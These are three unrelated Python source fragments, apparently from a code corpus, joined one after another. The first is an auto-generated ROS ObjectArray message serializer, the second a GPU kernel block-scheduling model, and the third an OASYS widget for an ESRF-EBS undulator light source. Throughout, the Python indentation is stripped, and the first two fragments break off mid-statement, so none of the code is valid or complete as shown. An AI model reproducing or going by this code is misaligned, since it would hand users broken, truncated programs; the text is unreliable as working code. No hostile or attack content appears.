MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
================================================================================
MSG: shape_msgs/SolidPrimitive
# Define box, sphere, cylinder, cone
# All shapes are defined to have their bounding boxes centered around 0,0,0.
uint8 BOX=1
uint8 SPHERE=2
uint8 CYLINDER=3
uint8 CONE=4
# The type of the shape
uint8 type
# The dimensions of the shape
float64[] dimensions
# The meaning of the shape dimensions: each constant defines the index in the 'dimensions' array
# For the BOX type, the X, Y, and Z dimensions are the length of the corresponding
# sides of the box.
uint8 BOX_X=0
uint8 BOX_Y=1
uint8 BOX_Z=2
# For the SPHERE type, only one component is used, and it gives the radius of
# the sphere.
uint8 SPHERE_RADIUS=0
# For the CYLINDER and CONE types, the center line is oriented along
# the Z axis. Therefore the CYLINDER_HEIGHT (CONE_HEIGHT) component
# of dimensions gives the height of the cylinder (cone). The
# CYLINDER_RADIUS (CONE_RADIUS) component of dimensions gives the
# radius of the base of the cylinder (cone). Cone and cylinder
# primitives are defined to be circular. The tip of the cone is
# pointing up, along +Z axis.
uint8 CYLINDER_HEIGHT=0
uint8 CYLINDER_RADIUS=1
uint8 CONE_HEIGHT=0
uint8 CONE_RADIUS=1
"""
__slots__ = ['header','objects']
_slot_types = ['std_msgs/Header','derived_object_msgs/Object[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,objects
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ObjectArray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.Header()
if self.objects is None:
self.objects = []
else:
self.header = std_msgs.Header()
self.objects = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.objects)
buff.write(_struct_I.pack(length))
for val1 in self.objects:
_v1 = val1.header
buff.write(_get_struct_I().pack(_v1.seq))
_v2 = _v1.stamp
_x = _v2
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v1.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1
buff.write(_get_struct_I2B().pack(_x.id, _x.detection_level, _x.object_classified))
_v3 = val1.pose
_v4 = _v3.position
_x = _v4
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v5 = _v3.orientation
_x = _v5
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v6 = val1.twist
_v7 = _v6.linear
_x = _v7
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v8 = _v6.angular
_x = _v8
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v9 = val1.accel
_v10 = _v9.linear
_x = _v10
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v11 = _v9.angular
_x = _v11
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v12 = val1.polygon
length = len(_v12.points)
buff.write(_struct_I.pack(length))
for val3 in _v12.points:
_x = val3
buff.write(_get_struct_3f().pack(_x.x, _x.y, _x.z))
_v13 = val1.shape
buff.write(_get_struct_B().pack(_v13.type))
length = len(_v13.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *_v13.dimensions))
_x = val1
buff.write(_get_struct_B().pack(_x.classification))
buff.write(_get_struct_B().pack( _x.classification_certainty))
buff.write(_get_struct_I().pack( _x.classification_age))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.Header()
if self.objects is None:
self.objects = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.objects = []
for i in range(0, length):
val1 = derived_object_msgs.msg.Object()
_v14 = val1.header
start = end
end += 4
(_v14.seq,) = _get_struct_I().unpack(str[start:end])
_v15 = _v14.stamp
_x = _v15
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v14.frame_id = str[start:end].decode('utf-8')
else:
_v14.frame_id = str[start:end]
_x = val1
start = end
end += 6
(_x.id, _x.detection_level, _x.object_classified,) = _get_struct_I2B().unpack(str[start:end])
val1.object_classified = bool(val1.object_classified)
_v16 = val1.pose
_v17 = | |
<filename>mem_mem/avgblk.py
import pandas as pd
import numpy as np
from math import *
import copy # deep copy objects
from model_param import *
#------------------------------------------------------------------------------
# Figure out when to launch another block for current kernel
#------------------------------------------------------------------------------
def Search_block_start(df_sm_trace, current_kernel_id):
"""
Read the sm_trace table, find out all the active blocks on current sm,
look for the earliest start
"""
df_active = df_sm_trace.loc[df_sm_trace['active'] == 1]
if not df_active.empty:
blk2start = df_active['block_start'].max() # find the closest block
df_active_current_kernel = \
df_active.loc[df_active['kernel_id'] == current_kernel_id]
if not df_active_current_kernel.empty:
# find the closest blk for current kernel
blk2start = df_active_current_kernel['block_start'].max()
return blk2start
else:
# when, on current sm, all the blocks are done/de-activated
# warning!!!
return 0.0
#------------------------------------------------------------------------------
# Figure out which sm to start for current kernel
#------------------------------------------------------------------------------
def find_sm2start(sm_trace_list, kern_start):
sm_num = len(sm_trace_list)
AfterPrevKern = False
empSM = 0
# case 1) there are no trace on each sm
for df_sm in sm_trace_list:
if df_sm.empty:
empSM = empSM + 1 # do nothing
if empSM == sm_num:
return 0, AfterPrevKern
# case 2) there are traces: by the time where the kernel starts,
# all the blocks are done already, use sm 0
max_t = 0
for df_sm in sm_trace_list:
cur_max = df_sm.block_end.max()
if cur_max > max_t:
max_t = cur_max
if max_t <= kern_start:
AfterPrevKern = True
return 0, AfterPrevKern
else:
# case 3) : check currently active blocks
df_sm = sm_trace_list[0]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
min_t = df_activeblk.block_end.min()
target_sm = 0
for i in range(1,sm_num):
df_sm = sm_trace_list[i]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
sm_blk_min = df_activeblk.block_end.min()
if sm_blk_min < min_t:
min_t = sm_blk_min
target_sm = i
return target_sm, AfterPrevKern
#------------------------------------------------------------------------------
# model cke function
#------------------------------------------------------------------------------
def cke_model(Gpu, sms_, sm_trace_, kernels_):
# deep copy the input
# we need to return the resource and trace for each sm after modeling
sms = copy.deepcopy(sms_)
sm_trace = copy.deepcopy(sm_trace_)
kernels = copy.deepcopy(kernels_)
kernel_num = len(kernels)
sm_num = Gpu.sm_num
# go through each kernel
for i in range(kernel_num):
kern = kernels[i] # schedule current kernel on the device
kernel_blocks = int(kern.gridDim) # total block for current kern
kern_start = kern.start_ms
# 1) find the which sm to start
# 2) compute whether kernel_start happens before previous kernel ends or not
sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)
#---------------------------------------------------------
# Run after previous kernel
#---------------------------------------------------------
if AfterPrevKern:
# deactivate all the previous active blocks
myid = 0
for df_sm in sm_trace:
df_activeblk = df_sm.loc[df_sm['active'] == 1]
# find the row index of active blocks
for index, row in df_activeblk.iterrows():
sm_trace[myid].loc[index]['active'] = 0 # deactivate
sms[myid].Rm(kern) # free the block resource
myid = myid + 1
#---------------------------------------------------------
# Continue current kernel
#---------------------------------------------------------
for bid in range(kernel_blocks):
sm_id = (bid + sm2start) % sm_num
to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
#----------------------------------
# there is enough resource to host the current block
#----------------------------------
if to_allocate_another_block == True:
# deduct resources on the current sm
sms[sm_id].Allocate_block(kern)
#---------------------------------------
# register the block in the trace table
#---------------------------------------
block_start = None
offset = 0.0
# Noted: only the 1st block will adjut the kern_start
if AfterPrevKern and bid < sm_num:
offset = kern_start
# if current sm trace table is empty, start from kernel_start
# else find the blocks that will end soon, and retire them
if sm_trace[sm_id].empty:
block_start = kern_start # (fixed!)
else:
# read the sm_trace table, find out all the active blocks
# on current sm, look for the earliest start
block_start = Search_block_start(sm_trace[sm_id], i) + offset
#block_end = block_start + avg_blk_time_list[i]
block_end = block_start + kern.avg_blk_time
# add the current block info to the current sm
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start,
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': i,
'active': 1}, ignore_index=True)
#-------------------------------------------
# There is no more resources to host the blk, consider SM is full now
# we need to (1) decide how many blks to retire
# (2) when to start current blk
if to_allocate_another_block == False:
# find out the active blocks on current sm
df_sm = sm_trace[sm_id]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
df_loc = df_activeblk.copy(deep=True)
cur_activeblk_num = df_activeblk.shape[0]
for ii in range(cur_activeblk_num):
# find out blocks ending soon
blkend_min = df_loc['block_end'].min()
df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]
# retire the blocks
for index, row in df_blk2end.iterrows():
sm_trace[sm_id].loc[index]['active'] = 0
sms[sm_id].Rm(kern) # free the block resource
# enough to allocate a current block
if check_sm_resource(sms[sm_id], kern):
sms[sm_id].Allocate_block(kern)
# when prev blks end, current block starts
block_start = blkend_min
# add avgblktime for currrent kernel
#block_end = block_start + avg_blk_time_list[i]
block_end = block_start + kern.avg_blk_time
break # jump out of the loop
else:
# not enough to allocat another block, remove
# Warning: ??? I may just pass
#df_loc = df_sm.loc[df_sm['active'] == 1]
pass
# update the trace table
sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
'block_id': bid,
'block_start': block_start,
'block_end' : block_end,
'batch_id': sms[sm_id].batch,
'kernel_id': i,
'active': 1}, ignore_index=True)
# end of running blocks for current kernel
#end of kernel iteration
# return the updated sm resource and trace table
return sms, sm_trace
#------------------------------------------------------------------------------
# Find kern time on current sm
#------------------------------------------------------------------------------
def find_kernel_time(df_sm_trace, kern_id):
df_kern = df_sm_trace.loc[df_sm_trace.kernel_id == kern_id]
# min of start time, max of end time
return df_kern.block_start.min(), df_kern.block_end.max()
#------------------------------------------------------------------------------
# Find out kernel runtime by reading the traces from each SM
#------------------------------------------------------------------------------
def Get_KernTime(sm_trace):
kern_dd = {}
kernel_unique_ls = []
for df_sm in sm_trace:
kids = df_sm.kernel_id.unique() # find out all the kernels on current sm
#
# case 1: given the empty dd
if not kern_dd:
for kern_id in kids: # find kernel time for each unique kernel
startT, endT = find_kernel_time(df_sm, kern_id)
kern_dd[kern_id] = [startT, endT]
kernel_unique_ls.append(kern_id)
# case 2: the dd has values
if kern_dd:
for kern_id in kids: # find kernel time for each unique kernel
startT, endT = find_kernel_time(df_sm, kern_id)
if kern_id in kernel_unique_ls:
# compare the min and max for start and end, update
prev_start = kern_dd[kern_id][0]
prev_end = kern_dd[kern_id][1]
cur_start, cur_end = find_kernel_time(df_sm, kern_id)
update = 0
if cur_start < prev_start:
prev_start = cur_start # update
update = update + 1
if cur_end > prev_end:
prev_end = cur_end # update
update = update + 1
if update > 0:
kern_dd[kern_id] = [prev_start, prev_end]
else:
kern_dd[kern_id] = [startT, endT] # add to dd
kernel_unique_ls.append(kern_id)
return kern_dd
#------------------------------------------------------------------------------
# run a single gpu kernel one at a time
#------------------------------------------------------------------------------
def run_gpu_kernel(Gpu, sms_, sm_trace_, kern, kern_id):
sms = copy.deepcopy(sms_)
sm_trace = copy.deepcopy(sm_trace_)
sm_num = Gpu.sm_num
kernel_blocks = int(kern.gridDim) # total block for current kern
kern_start = kern.start_ms
# 1) find the which sm to start
# 2) compute whether kernel_start happens before previous kernel ends or not
sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)
#---------------------------------------------------------
# Run after previous kernel
#---------------------------------------------------------
if AfterPrevKern:
# deactivate all the previous active blocks
for df_sm in sm_trace:
df_activeblk = df_sm.loc[df_sm['active'] == 1]
if not df_activeblk.empty:
myid = int(df_activeblk.iloc[0]['sm_id'])
for index, row in df_activeblk.iterrows(): # find the row index of active blocks
sm_trace[myid].loc[index]['active'] = 0 # deactivate
sms[myid].Rm(kern) # free the block resource
#---------------------------------------------------------
# Continue current kernel
#---------------------------------------------------------
for bid in range(kernel_blocks):
sm_id = (bid + sm2start) % sm_num
to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
#----------------------------------
# there is enough resource to host the current block
#----------------------------------
if to_allocate_another_block == True:
sms[sm_id].Allocate_block(kern) # deduct resources on the current sm
#---------------------------------------
# register the block in the trace table
#---------------------------------------
block_start = None
offset = 0.0
if AfterPrevKern and bid < sm_num: # Noted: only the 1st block will adjut the kern_start
offset = kern_start
# if current sm trace table is empty, start from kern_start
# else find the blocks that will end soon, and retire them
if sm_trace[sm_id].empty:
block_start = kern_start
else:
# read the sm_trace table, find out all the active blocks on current sm, look for the earliest start
block_start = Search_block_start(sm_trace[sm_id], kern_id) + offset
block_end = block_start | |
<reponame>oasys-esrf-kit/OASYS1-ESRF-Extensions
import os, sys
import numpy
import scipy.constants as codata
from syned.storage_ring.magnetic_structures.undulator import Undulator
from syned.storage_ring.magnetic_structures import insertion_device
from PyQt5.QtGui import QPalette, QColor, QFont
from PyQt5.QtWidgets import QMessageBox, QApplication
from PyQt5.QtCore import QRect
from orangewidget import gui
from orangewidget import widget
from orangewidget.settings import Setting
from oasys.widgets.widget import OWWidget
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.widgets.gui import ConfirmDialog
from syned.storage_ring.light_source import LightSource, ElectronBeam
from syned.beamline.beamline import Beamline
from oasys.widgets.gui import ConfirmDialog
import orangecanvas.resources as resources
m2ev = codata.c * codata.h / codata.e
VERTICAL = 1
HORIZONTAL = 2
BOTH = 3
class OWEBS(OWWidget):
name = "ESRF-EBS ID Light Source"
description = "Syned: ESRF-EBS ID Light Source"
icon = "icons/ebs.png"
priority = 1
maintainer = "<NAME>"
maintainer_email = "<EMAIL>"
category = "ESRF-EBS Syned Light Sources"
keywords = ["data", "file", "load", "read"]
outputs = [{"name":"SynedData",
"type":Beamline,
"doc":"Syned Beamline",
"id":"data"}]
want_main_area = 1
MAX_WIDTH = 1320
MAX_HEIGHT = 700
IMAGE_WIDTH = 860
IMAGE_HEIGHT = 645
CONTROL_AREA_WIDTH = 405
TABS_AREA_HEIGHT = 650
TABS_AREA_HEIGHT = 625
CONTROL_AREA_WIDTH = 450
electron_energy_in_GeV = Setting(6.0)
electron_energy_spread = Setting(0.001)
ring_current = Setting(0.2)
number_of_bunches = Setting(0.0)
moment_xx = Setting(0.0)
moment_xxp = Setting(0.0)
moment_xpxp = Setting(0.0)
moment_yy = Setting(0.0)
moment_yyp = Setting(0.0)
moment_ypyp = Setting(0.0)
electron_beam_size_h = Setting(0.0)
electron_beam_divergence_h = Setting(0.0)
electron_beam_size_v = Setting(0.0)
electron_beam_divergence_v = Setting(0.0)
electron_beam_emittance_h = Setting(0.0)
electron_beam_emittance_v = Setting(0.0)
electron_beam_beta_h = Setting(0.0)
electron_beam_beta_v = Setting(0.0)
electron_beam_alpha_h = Setting(0.0)
electron_beam_alpha_v = Setting(0.0)
electron_beam_eta_h = Setting(0.0)
electron_beam_eta_v = Setting(0.0)
electron_beam_etap_h = Setting(0.0)
electron_beam_etap_v = Setting(0.0)
type_of_properties = Setting(1)
auto_energy = Setting(0.0)
auto_harmonic_number = Setting(1)
K_horizontal = Setting(1.0)
K_vertical = Setting(1.0)
period_length = Setting(0.010)
number_of_periods = Setting(10)
ebs_id_index = Setting(0)
gap_mm = Setting(0.0)
gap_min = Setting(5.0)
gap_max = Setting(20.0)
harmonic_max = Setting(3)
a0 = Setting(20.0)
a1 = Setting(0.2)
a2 = Setting(0.0)
a3 = Setting(0.0)
a4 = Setting(0.0)
a5 = Setting(0.0)
a6 = Setting(0.0)
# data_url = 'ftp://ftp.esrf.eu/pub/scisoft/syned/resources/jsrund.csv'
# create it in nice with the ID app: /segfs/tango/bin/jsrund
data_url = os.path.join(resources.package_dirname("orangecontrib.esrf.syned.data"), 'jsrund.csv')
data_dict = None
def __init__(self):
self.get_data_dictionary_csv()
# OLD FORMAT
# self.data_url = "https://raw.githubusercontent.com/srio/shadow3-scripts/master/ESRF-LIGHTSOURCES-EBS/ebs_ids.json"
# self.get_data_dictionary()
self.runaction = widget.OWAction("Send Data", self)
self.runaction.triggered.connect(self.send_data)
self.addAction(self.runaction)
button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")
button = gui.button(button_box, self, "Send Data", callback=self.send_data)
font = QFont(button.font())
font.setBold(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button = gui.button(button_box, self, "Reset Fields", callback=self.callResetSettings)
font = QFont(button.font())
font.setItalic(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Red'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button.setFixedWidth(150)
gui.separator(self.controlArea)
geom = QApplication.desktop().availableGeometry()
self.setGeometry(QRect(round(geom.width()*0.05),
round(geom.height()*0.05),
round(min(geom.width()*0.98, self.MAX_WIDTH)),
round(min(geom.height()*0.95, self.MAX_HEIGHT))))
self.setMaximumHeight(self.geometry().height())
self.setMaximumWidth(self.geometry().width())
self.controlArea.setFixedWidth(self.CONTROL_AREA_WIDTH)
self.tabs_setting = oasysgui.tabWidget(self.controlArea)
self.tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
self.tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)
self.tab_sou = oasysgui.createTabPage(self.tabs_setting, "Light Source Setting")
gui.comboBox(self.tab_sou, self, "ebs_id_index", label="Load ID parameters from database list: ", labelWidth=350,
items=self.get_id_list(), callback=self.set_id, sendSelectedValue=False, orientation="horizontal")
self.electron_beam_box = oasysgui.widgetBox(self.tab_sou, "Electron Beam/Machine Parameters", addSpace=False, orientation="vertical")
oasysgui.lineEdit(self.electron_beam_box, self, "electron_energy_in_GeV", "Energy [GeV]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.electron_beam_box, self, "electron_energy_spread", "Energy Spread", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.electron_beam_box, self, "ring_current", "Ring Current [A]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
gui.comboBox(self.electron_beam_box, self, "type_of_properties", label="Electron Beam Properties", labelWidth=350,
items=["From 2nd Moments", "From Size/Divergence", "From Twiss papameters","Zero emittance", "EBS (S28D)"],
callback=self.update_electron_beam,
sendSelectedValue=False, orientation="horizontal")
self.left_box_2_1 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="vertical", height=150)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_xx", "<x x> [m^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_xxp", "<x x'> [m.rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_xpxp", "<x' x'> [rad^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_yy", "<y y> [m^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_yyp", "<y y'> [m.rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_1, self, "moment_ypyp", "<y' y'> [rad^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
self.left_box_2_2 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="vertical", height=150)
oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_size_h", "Horizontal Beam Size \u03c3x [m]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_size_v", "Vertical Beam Size \u03c3y [m]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_divergence_h", "Horizontal Beam Divergence \u03c3'x [rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_divergence_v", "Vertical Beam Divergence \u03c3'y [rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
self.left_box_2_3 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="horizontal",height=150)
self.left_box_2_3_l = oasysgui.widgetBox(self.left_box_2_3, "", addSpace=False, orientation="vertical")
self.left_box_2_3_r = oasysgui.widgetBox(self.left_box_2_3, "", addSpace=False, orientation="vertical")
oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_emittance_h", "\u03B5x [m.rad]",labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_alpha_h", "\u03B1x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_beta_h", "\u03B2x [m]", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_eta_h", "\u03B7x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_etap_h", "\u03B7'x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_emittance_v", "\u03B5y [m.rad]",labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_alpha_v", "\u03B1y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_beta_v", "\u03B2y [m]", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_eta_v", "\u03B7y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_etap_v", "\u03B7'y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
gui.rubber(self.controlArea)
###################
left_box_1 = oasysgui.widgetBox(self.tab_sou, "ID Parameters", addSpace=True, orientation="vertical")
oasysgui.lineEdit(left_box_1, self, "period_length", "Period Length [m]", labelWidth=260,
valueType=float, orientation="horizontal", callback=self.update)
oasysgui.lineEdit(left_box_1, self, "number_of_periods", "Number of Periods", labelWidth=260,
valueType=float, orientation="horizontal", callback=self.update)
left_box_1 = oasysgui.widgetBox(self.tab_sou, "Setting", addSpace=True, orientation="vertical")
# oasysgui.lineEdit(left_box_1, self, "K_horizontal", "Horizontal K", labelWidth=260, valueType=float, orientation="horizontal")
oasysgui.lineEdit(left_box_1, self, "K_vertical", "Vertical K", labelWidth=260,
valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_1, self, "gap_mm", "Undulator Gap [mm]",
labelWidth=250, valueType=float, orientation="horizontal",
callback=self.set_gap)
left_box_2 = oasysgui.widgetBox(left_box_1, "", addSpace=False, orientation="vertical")
oasysgui.lineEdit(left_box_2, self, "auto_energy", "Photon Energy [eV]",
labelWidth=250, valueType=float, orientation="horizontal",
callback=self.auto_set_undulator_V)
oasysgui.lineEdit(left_box_2, self, "auto_harmonic_number", "Harmonic",
labelWidth=250, valueType=int, orientation="horizontal",
callback=self.auto_set_undulator_V)
####################################################
tab_util = oasysgui.createTabPage(self.tabs_setting, "Settings")
left_box_0 = oasysgui.widgetBox(tab_util, "Advanced settings",
addSpace=False, orientation="vertical", height=450)
oasysgui.lineEdit(left_box_0, self, "gap_min", "minimum gap",
labelWidth=260, valueType=float, orientation="horizontal",
callback=self.update)
oasysgui.lineEdit(left_box_0, self, "gap_max", "maximum gap (for plots)",
labelWidth=260, valueType=float, orientation="horizontal",
callback=self.update)
oasysgui.lineEdit(left_box_0, self, "harmonic_max", "maximum harmonic (for plots)",
labelWidth=260, valueType=int, orientation="horizontal",
callback=self.update)
left_box_00 = oasysgui.widgetBox(left_box_0, "Gap parametrization", addSpace=False, orientation="vertical")
oasysgui.lineEdit(left_box_00, self, "a0", "a0", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a1", "a1", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a2", "a2", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a3", "a3", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a4", "a4", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a5", "a5", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
oasysgui.lineEdit(left_box_00, self, "a6", "a6", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
self.initializeTabs()
# self.populate_gap_parametrization()
# self.populate_electron_beam()
# self.populate_magnetic_structure()
# self.set_ebs_electron_beam()
self.populate_settings_after_setting_K()
self.set_visible()
self.update()
def get_id_list(self):
out_list = [("ID%02d %s" % (self.data_dict["straight_section"][i], self.data_dict["id_name"][i])) for i in
range(len(self.data_dict["id_name"]))]
out_list.insert(0,"<None>") # We add None at the beginning: ebs_id_index is the dict index plus one
return out_list
def titles(self):
return ["K vs Gap", "B vs Gap", "Gap vs resonance energy", "Power vs Gap"]
def xtitles(self):
return ['Gap [mm]'] * len(self.titles())
def ytitles(self):
return ['K', 'B [T]', 'Photon energy [eV]', 'Power [W]']
def initializeTabs(self):
self.tabs = oasysgui.tabWidget(self.mainArea)
self.tab = [oasysgui.createTabPage(self.tabs, "Info",),
oasysgui.createTabPage(self.tabs, "K vs Gap"),
oasysgui.createTabPage(self.tabs, "B vs Gap"),
oasysgui.createTabPage(self.tabs, "Resonance vs Gap"),
oasysgui.createTabPage(self.tabs, "Power vs Gap"),
]
for tab in self.tab:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
self.info_id = oasysgui.textArea(height=self.IMAGE_HEIGHT-5, width=self.IMAGE_WIDTH-5)
profile_box = oasysgui.widgetBox(self.tab[0], "", addSpace=True, orientation="horizontal",
height = self.IMAGE_HEIGHT, width=self.IMAGE_WIDTH-5)
profile_box.layout().addWidget(self.info_id)
n_plots = len(self.titles())
self.plot_canvas = [None] * (1 + n_plots)
for i in range(n_plots):
self.plot_canvas[i] = oasysgui.plotWindow(roi=False, control=False, position=True)
self.plot_canvas[i].setDefaultPlotLines(True)
self.plot_canvas[i].setActiveCurveColor(color='blue')
self.plot_canvas[i].setGraphXLabel(self.xtitles()[i])
self.plot_canvas[i].setGraphYLabel(self.ytitles()[i])
self.plot_canvas[i].setGraphTitle(self.titles()[i])
self.plot_canvas[i].setInteractiveMode(mode='zoom')
for index in range(0, 4):
self.tab[index + 1].layout().addWidget(self.plot_canvas[index])
self.tabs.setCurrentIndex(1)
def check_magnetic_structure(self):
congruence.checkPositiveNumber(self.K_horizontal, "Horizontal K")
congruence.checkPositiveNumber(self.K_vertical, "Vertical K")
congruence.checkStrictlyPositiveNumber(self.period_length, "Period Length")
congruence.checkStrictlyPositiveNumber(self.number_of_periods, "Number of Periods")
def get_magnetic_structure(self):
return insertion_device.InsertionDevice(K_horizontal=self.K_horizontal,
K_vertical=self.K_vertical,
period_length=self.period_length,
number_of_periods=self.number_of_periods)
def set_ebs_electron_beam(self):
self.type_of_properties = 1
self.electron_beam_size_h = 30.1836e-6
self.electron_beam_size_v = 3.63641e-6
self.electron_beam_divergence_h = 4.36821e-6
self.electron_beam_divergence_v = 1.37498e-6
#
eb = self.get_light_source().get_electron_beam()
moment_xx, moment_xxp, moment_xpxp, moment_yy, moment_yyp, moment_ypyp = eb.get_moments_all()
self.moment_xx = moment_xx
self.moment_yy = moment_yy
self.moment_xxp = moment_xxp
self.moment_yyp = moment_yyp
self.moment_xpxp = moment_xpxp
self.moment_ypyp = moment_ypyp
ex, ax, bx, ey, ay, by = eb.get_twiss_no_dispersion_all()
self.electron_beam_beta_h = bx
self.electron_beam_beta_v = by
